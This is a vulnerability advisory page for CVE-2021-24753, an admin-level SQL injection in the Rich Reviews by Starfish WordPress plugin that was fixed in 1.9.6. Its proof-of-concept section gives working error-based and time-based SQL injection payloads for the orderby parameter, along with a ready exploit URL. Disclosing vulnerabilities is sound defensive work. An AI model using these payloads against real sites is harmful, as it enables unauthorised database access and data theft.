Rich Reviews by Starfish < 1.9.6 – Admin+ SQL Injection | CVE 2021-24753 | Plugin Vulnerabilities

Description

The plugin does not properly validate the orderby GET parameter of the pending reviews page before using it in a SQL statement, leading to an authenticated SQL injection issue

Proof of Concept

error-based SQLI: orderby=id AND EXTRACTVALUE(4795,CONCAT(0x5c,0x717a627871,(SELECT (ELT(4795=4795,1))),0x7176707071))
time-based blind SQLI: orderby=id AND (SELECT 1339 FROM (SELECT(SLEEP(5)))Ozmh)

https://example.com/wp-admin/admin.php?page=fp_admin_pending_reviews_page&order=asc&orderby=id+AND+%28SELECT+1339+FROM+%28SELECT%28SLEEP%285%29%29%29Ozmh%29

Affects Plugins

Fixed in 1.9.6

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2624882/

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

bl4derunner

Submitter

Anton Sarsadskikh

Verified

Yes

WPVDB ID

be7b102f-3982-46bd-a79c-203498f7c820

Timeline

Publicly Published

2021-11-29 (about 4 years ago)

Added

2021-11-29 (about 4 years ago)

Last Updated

2022-04-10 (about 3 years ago)

Other

Published

Title

Published

2014-09-19

Title

Gallery Objects <= 0.4 - SQL Injection

Published

2014-08-01

Title

WP Forum Server 1.6.5 - index.php Multiple Parameter SQL Injection

Published

2015-12-02

Title

Users Ultra Membership Plugin <= 1.5.63 - Authenticated Blind SQL Injection

Published

2025-04-17

Title

Taskbuilder < 4.0.2 - Authenticated (Subscriber+) SQL Injection

Published

2021-10-11

Title

WPSchoolPress < 2.1.10 - Multiple Authenticated SQL Injections